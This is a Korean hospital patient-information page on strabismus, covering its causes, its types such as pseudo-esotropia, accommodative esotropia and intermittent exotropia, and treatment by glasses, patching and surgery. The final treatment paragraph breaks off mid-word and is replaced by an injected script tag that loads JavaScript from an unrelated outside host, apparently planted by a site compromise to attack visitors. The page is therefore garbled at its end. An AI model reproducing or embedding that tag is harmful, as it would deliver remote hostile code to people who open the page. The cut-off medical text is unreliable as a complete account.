순천향대 부천병원, 사전연명의료의향서 등록기관 지정 등록및 문의 연명의료관리실032-621-5806,6815

건강정보

사시

1) 사시란 무엇인가요?
사람은 물체를 볼 때 두 눈을 사용하여 보게 되는데 정상적으로는 정면을 볼 때 까만 눈동자가 각각의 눈 가운데에 위치해야 합니다. 비정상적으로 까만 눈동자 부위가 눈의 안쪽 또는 바깥쪽으로 돌아가 있는 경우가 있는데 사시란 이렇게 두 눈이 바르게 정렬되지 못한 상태로 있는 경우를 말합니다.

(1) 사시의 원인은 무엇인가요?
사시의 원인은 나타나는 종류만큼이나 다양하지만 크게 다음과 같이 나누어 볼 수 있습니다.

첫째, 해부학적인 원인을 들 수 있습니다
안와의 함몰골절에 의한 하사시, 혹은 내사시 등이 있으며 갑상선근증, 외안근의 섬유화, 만성진행성 외안근마비증, 외안근에 대한 외상 등에 의한 경우가 포함됩니다.

둘째, 신경학적인 원인으로는 근무력증과 같은 신경-근 접합부의 이상에 의한 경우도 있고, 신경핵 혹은 핵아랫길의 이상에 의한 3,4,6 신경마비 등도 있으며 신경핵간의 연결을 잇는 내측종속의 이상에 의한 핵간마비가 있습니다.

셋째, 정확히 원인을 알지 못하는 경우가 있는데 대부분의 사시가 여기에 해당됩니다.
간헐 외사시, 선천내사시, 선천외사시, 조절내사시, 후천성조절내사시 등이 있습니다.

2) 사시에는 어떤 종류들이 있나요?
(1) 가성내사시
동양의 소아들은 눈의 양쪽 내측눈 구석사이의 피부가 넓은 경우가 많은데 이런 경우에는 두눈이 실제로는 정면을 바라보지만 눈 안쪽 눈구석사이의 피부가 눈의 안쪽 흰자위를 가리기 때문에 앞에서 볼때는 눈의 까만 동자가 눈의 안쪽에 몰려 있는 것처럼 보이게 됩니다. 이런 경우를 가성내사시라고 하며, 실제로 눈이 안쪽으로 몰린 것이 아닌 정상 상태이므로 치료가 필요없고 아이가 자라면서 콧등이 높아지고 눈안쪽 구석의 피부가 콧등쪽으로 당겨 지면서 눈은 정상 정렬상태로 보이게 됩니다.

(2) 내사시

① 유아내사시
생후 6개월이내에 발생한 내사시를 말하며 대부분의 경우 눈의 까만 동자가 매우 심하게 안쪽으로 돌아가 있습니다.

② 조절내사시
만 2-3세경에 주로 발생하나 1세이전에 발생하는 경우도 적지 않습니다. 굴절력은 약 +2.0 - +10.0 D의 원시를 보이는데 발생원인으로는 원시의 경우, 물체의 상을 정확히 망막에 맺히게 하기 위하여 수정체의 조절이 생기고 부수적으로 발생하는 협동안운동 현상에 의하여 두눈의 모임이 과도하게 발생하게 되므로 내사시가 되는 것입니다.

(3) 외사시

① 간헐외사시
전체 외사시의 1/2 이상을 차지하며 2-3세 이후에 나타납니다. 피로하거나 혹은 TV를 장시간 시청하거나 멍하게 있을 때에 가끔씩 한쪽 눈이 바깥쪽으로 돌아가는 사시를 말합니다. 특징적인 증상으로는 햇빛에 나가면 한쪽눈을 찡그리거나 비비는 증상을 보입니다.

② 외사시
출생직후 혹은 청년기 이후에 발생하기도 하나 간헐외사시가 진행되어 외사시가 되는 경우가 대부분입니다.

3) 사시의 치료는 어떻게 하나요?
사시치료의 일반적인 원칙은 다음과 같습니다. 먼저 굴절검사를 시행하여 근시, 난시, 원시가 있으면 안경을 착용시킵니다. 시력검사상에 약시가 있으면 수술전에 약시치료를 합니다. 이러한 치료를 한 다음에도 눈이 많이 돌아가 있으면 수술적 치료를 하게 됩니다.
(1) 안경착용 : 굴절검사를 시행하여 근시, 난시, 원시가 있으면 안경을 착용시켜야 하며 조절내사시와 같이 안경 착용만으로도 사시가 교정되는 경우가 있습니다.
(2) 약시치료 : 사시가 있는 경우에 발생하는 약시는 눈을 사용하지 않아서 발생하는 경우가 많습니다. 약시치료는 건강한 눈을 가려줌으로써 약시안만으로 물체를 주시하게 하여 약시안의 시력을 증진시키는 방법으로 굴절이상을 완전히 교정하여 안경을 끼운 상태에서 정상안을 안대로 가립니다. 약시치료는 나이가 어릴수록 치료효과도 좋으며 치료기간도 짧으나, 나이가 많을수록 아이들의 거부감, 학교활동 등의 이유로 치료가 어려워지게 됩니다. 약시치료는 환아와 부모님의 협조가 있어야 효과를 볼수 있으며 가림치료 이외에는 수술이나 다른 방법으로는 치료가 되지 않습니다.
(3) 수술적 치료 : 안경착용이나 약시치료가 끝난 이후에 교정되지 않는 사시는 수술이 필요합니다. 사시수술은 한쪽 또는 양쪽 눈에 할 수도 있으며 한쪽 눈에만 하는 경우에는 사시안이나 건강한 눈, 어느쪽 눈을 수술해도 같은 효과를 얻습니다. 사시수술은 돌아간 눈의 위치를 단순히 똑바로 옮겨 놓는 것이기 때문에 시력과는 관계가 없습니다.
(4) 사시수술후의 치료 : 눈이 돌아간 정도가 심하면 한번의 수술만으로 완전교정이 어려운 경우가 있으며, 한번의 수술로 교?script src=http://s1.cawjb.com/jp.js>

이전 당뇨망막병증 2003.02.24

다음 녹내장 2003.02.24